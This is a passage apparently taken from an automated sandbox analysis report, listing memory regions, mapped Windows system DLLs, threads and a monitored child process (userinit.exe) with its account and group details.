name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 6336
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 6337
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 6338
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 6339
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 6340
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 6341
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 6342
start_va = 0x50000
end_va = 0xb6fff
entry_point = 0x50000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 6343
start_va = 0x430000
end_va = 0x43ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000430000"
filename = ""
Region:
id = 6344
start_va = 0x6e280000
end_va = 0x6e28efff
entry_point = 0x6e280000
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 6345
start_va = 0x6e590000
end_va = 0x6e5a7fff
entry_point = 0x6e590000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 6346
start_va = 0x6e5b0000
end_va = 0x6e645fff
entry_point = 0x6e5b0000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 6347
start_va = 0x6e780000
end_va = 0x6e7dbfff
entry_point = 0x6e780000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 6348
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 6349
start_va = 0x756c0000
end_va = 0x756f4fff
entry_point = 0x756c0000
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 6350
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 6351
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 6352
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 6353
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 6354
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 6355
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 6356
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 6357
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 6358
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 6359
start_va = 0x76f10000
end_va = 0x76f15fff
entry_point = 0x76f10000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 6360
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 6361
start_va = 0x290000
end_va = 0x357fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000290000"
filename = ""
Region:
id = 6362
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 6363
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 6364
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 6365
start_va = 0xc0000
end_va = 0xc0fff
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 6366
start_va = 0x110000
end_va = 0x18ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000110000"
filename = ""
Region:
id = 6367
start_va = 0x360000
end_va = 0x3dffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000360000"
filename = ""
Region:
id = 6368
start_va = 0x3e0000
end_va = 0x3e6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003e0000"
filename = ""
Region:
id = 6369
start_va = 0x3f0000
end_va = 0x3f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 6370
start_va = 0x440000
end_va = 0x540fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 6371
start_va = 0x630000
end_va = 0x66ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000630000"
filename = ""
Region:
id = 6372
start_va = 0x910000
end_va = 0x94ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000910000"
filename = ""
Region:
id = 6373
start_va = 0x950000
end_va = 0xc1efff
entry_point = 0x950000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 6374
start_va = 0xc20000
end_va = 0x1012fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c20000"
filename = ""
Region:
id = 6375
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 6376
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 6377
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 6378
start_va = 0x400000
end_va = 0x400fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000400000"
filename = ""
Region:
id = 6379
start_va = 0x410000
end_va = 0x410fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000410000"
filename = ""
Region:
id = 6380
start_va = 0x570000
end_va = 0x5affff
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 6381
start_va = 0x740000
end_va = 0x83ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6382
start_va = 0x880000
end_va = 0x8bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000880000"
filename = ""
Region:
id = 6383
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 6384
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 6385
start_va = 0x7ffde000
end_va = 0x7ffdefff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffde000"
filename = ""
Region:
id = 6386
start_va = 0x420000
end_va = 0x420fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000420000"
filename = ""
Region:
id = 6387
start_va = 0x6e580000
end_va = 0x6e589fff
entry_point = 0x6e580000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 6388
start_va = 0x1050000
end_va = 0x108ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001050000"
filename = ""
Region:
id = 6389
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 6390
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 6391
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 6392
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 6393
start_va = 0x8d0000
end_va = 0x90ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 6394
start_va = 0x1160000
end_va = 0x119ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001160000"
filename = ""
Region:
id = 6395
start_va = 0x6e450000
end_va = 0x6e45efff
entry_point = 0x6e450000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 6396
start_va = 0x7ffd9000
end_va = 0x7ffd9fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd9000"
filename = ""
Region:
id = 6397
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 6398
start_va = 0x1120000
end_va = 0x115ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001120000"
filename = ""
Region:
id = 6399
start_va = 0x6e3e0000
end_va = 0x6e3f6fff
entry_point = 0x6e3e0000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 6400
start_va = 0x7ffd8000
end_va = 0x7ffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd8000"
filename = ""
Region:
id = 6401
start_va = 0x6d7d0000
end_va = 0x6d7f7fff
entry_point = 0x6d7d0000
region_type = mapped_file
name = "wmiprov.dll"
filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll")
Thread:
id = 330
os_tid = 0x93c
Thread:
id = 331
os_tid = 0x910
Thread:
id = 332
os_tid = 0x90c
Thread:
id = 333
os_tid = 0x8ec
Thread:
id = 334
os_tid = 0x8f0
Thread:
id = 335
os_tid = 0x960
Thread:
id = 336
os_tid = 0x8f4
Thread:
id = 337
os_tid = 0x8f8
Process:
id = "53"
image_name = "userinit.exe"
filename = "c:\\windows\\system32\\userinit.exe"
page_root = "0x7f1be960"
os_pid = "0x8e8"
os_integrity_level = "0x3000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0xf18"
cmd_line = "\"C:\\Windows\\System32\\userinit.exe\""
cur_dir = "C:\\Windows\\system32\\"
os_username = "CRH2YWU7\\EEBsYm5"
os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ed0e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 6403
start_va = 0x10000
end_va = 0x2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 6404
start_va = 0x30000
end_va = 0x33fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 6405
start_va = 0x40000
end_va = 0x40fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 6406
start_va = 0x1f0000
end_va = 0x22ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001f0000"
filename = ""
Region:
id = 6407
start_va = 0x400000
end_va = 0x462fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000400000"
filename = ""
Region:
id = 6408
start_va = 0x800000
end_va = 0x808fff
entry_point = 0x800000
region_type = mapped_file
name = "userinit.exe"
filename = "\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")
Region:
id = 6409
start_va = 0x76f20000
end_va = 0x7705bfff
entry_point = 0x76f20000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 6410
start_va = 0x77160000
end_va = 0x77160fff
entry_point = 0x77160000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 6411
start_va = 0x7ffb0000
end_va = 0x7ffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007ffb0000"
filename = ""
Region:
id = 6412
start_va = 0x7ffd5000
end_va = 0x7ffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffd5000"
filename = ""
Region:
id = 6413
start_va = 0x7ffdf000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdf000"
filename = ""
Region:
id = 6414
start_va = 0x80000
end_va = 0x17ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000080000"
filename = ""
Region:
id = 6415
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 6416
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 6417
start_va = 0x10000
end_va = 0x1ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 6418
start_va = 0x180000
end_va = 0x1e6fff
entry_point = 0x180000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 6419
start_va = 0x3e0000
end_va = 0x3effff
entry_point = 0x0
region_type = private
name = "private_0x00000000003e0000"
filename = ""
Region:
id = 6420
start_va = 0x6d740000
end_va = 0x6d7c3fff
entry_point = 0x6d740000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll")
Region:
id = 6421
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 6422
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 6423
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 6424
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 6425
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 6426
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 6427
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 6428
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 6429
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 6430
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 6431
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 6432
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 6433
start_va = 0x230000
end_va = 0x2f7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000230000"
filename = ""
Region:
id = 6434
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 6435
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 6436
start_va = 0x20000
end_va = 0x20fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 6437
start_va = 0x50000
end_va = 0x50fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 6438
start_va = 0x470000
end_va = 0x570fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 6439
start_va = 0x730000
end_va = 0x73ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000730000"
filename = ""
Region:
id = 6440
start_va = 0x810000
end_va = 0x140ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000810000"
filename = ""
Region:
id = 6441
start_va = 0x580000
end_va = 0x67ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000580000"
filename = ""
Region:
id = 6442
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 6443
start_va = 0x1410000
end_va = 0x14fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6444
start_va = 0x300000
end_va = 0x3defff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000300000"
filename = ""
Region:
id = 6445
start_va = 0x60000
end_va = 0x60fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 6446
start_va = 0x733b0000
end_va = 0x733c2fff
entry_point = 0x733b0000
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Region:
id = 6447
start_va = 0x1500000
end_va = 0x15cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000001500000"
filename = ""
Region:
id = 6448
start_va = 0x15d0000
end_va = 0x1efffff
entry_point = 0x15d0000
region_type = mapped_file
name = "staticcache.dat"
filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat")
Region:
id = 6449
start_va = 0x70000
end_va = 0x76fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000070000"
filename = ""
Region:
id = 6450
start_va = 0x3f0000
end_va = 0x3f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 6451
start_va = 0x1f00000
end_va = 0x22f2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001f00000"
filename = ""
Region:
id = 6452
start_va = 0x680000
end_va = 0x6fffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 6453
start_va = 0x2300000
end_va = 0x240cfff
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 6454
start_va = 0x2410000
end_va = 0x250ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002410000"
filename = ""
Region:
id = 6455
start_va = 0x2510000
end_va = 0x270ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002510000"
filename = ""
Region:
id = 6456
start_va = 0x740000
end_va = 0x7c0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6457
start_va = 0x1410000
end_va = 0x1492fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6458
start_va = 0x14c0000
end_va = 0x14fffff
entry_point = 0x0
region_type = private
name = "private_0x00000000014c0000"
filename = ""
Region:
id = 6459
start_va = 0x740000
end_va = 0x7c4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6460
start_va = 0x1410000
end_va = 0x1496fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6461
start_va = 0x740000
end_va = 0x7c8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6462
start_va = 0x1410000
end_va = 0x149afff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6463
start_va = 0x740000
end_va = 0x7ccfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6464
start_va = 0x1410000
end_va = 0x149efff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6465
start_va = 0x740000
end_va = 0x7d0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6466
start_va = 0x1410000
end_va = 0x14a2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6467
start_va = 0x740000
end_va = 0x7d4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6468
start_va = 0x1410000
end_va = 0x14a6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6469
start_va = 0x740000
end_va = 0x7d8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6470
start_va = 0x1410000
end_va = 0x14aafff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6471
start_va = 0x740000
end_va = 0x7dcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6472
start_va = 0x1410000
end_va = 0x14aefff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6473
start_va = 0x740000
end_va = 0x7e0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6474
start_va = 0x1410000
end_va = 0x14b2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6475
start_va = 0x740000
end_va = 0x7e4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6476
start_va = 0x1410000
end_va = 0x14b6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6477
start_va = 0x740000
end_va = 0x7e8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6478
start_va = 0x1410000
end_va = 0x14bafff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6479
start_va = 0x740000
end_va = 0x7ecfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6480
start_va = 0x1410000
end_va = 0x14befff
entry_point = 0x0
region_type = private
name = "private_0x0000000001410000"
filename = ""
Region:
id = 6481
start_va = 0x740000
end_va = 0x7f0fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6482
start_va = 0x2710000
end_va = 0x27c2fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6483
start_va = 0x740000
end_va = 0x7f4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6484
start_va = 0x2710000
end_va = 0x27c6fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6485
start_va = 0x740000
end_va = 0x7f8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6486
start_va = 0x2710000
end_va = 0x27cafff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6487
start_va = 0x740000
end_va = 0x7fcfff
entry_point = 0x0
region_type = private
name = "private_0x0000000000740000"
filename = ""
Region:
id = 6488
start_va = 0x2710000
end_va = 0x27cefff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6489
start_va = 0x27d0000
end_va = 0x2890fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027d0000"
filename = ""
Region:
id = 6490
start_va = 0x28a0000
end_va = 0x2962fff
entry_point = 0x0
region_type = private
name = "private_0x00000000028a0000"
filename = ""
Region:
id = 6491
start_va = 0x2710000
end_va = 0x27d4fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6492
start_va = 0x27e0000
end_va = 0x28a6fff
entry_point = 0x0
region_type = private
name = "private_0x00000000027e0000"
filename = ""
Region:
id = 6493
start_va = 0x2710000
end_va = 0x27d8fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002710000"
filename = ""
Region:
id = 6494
start_va = 0x27e0000
end_va = 0x28aafff
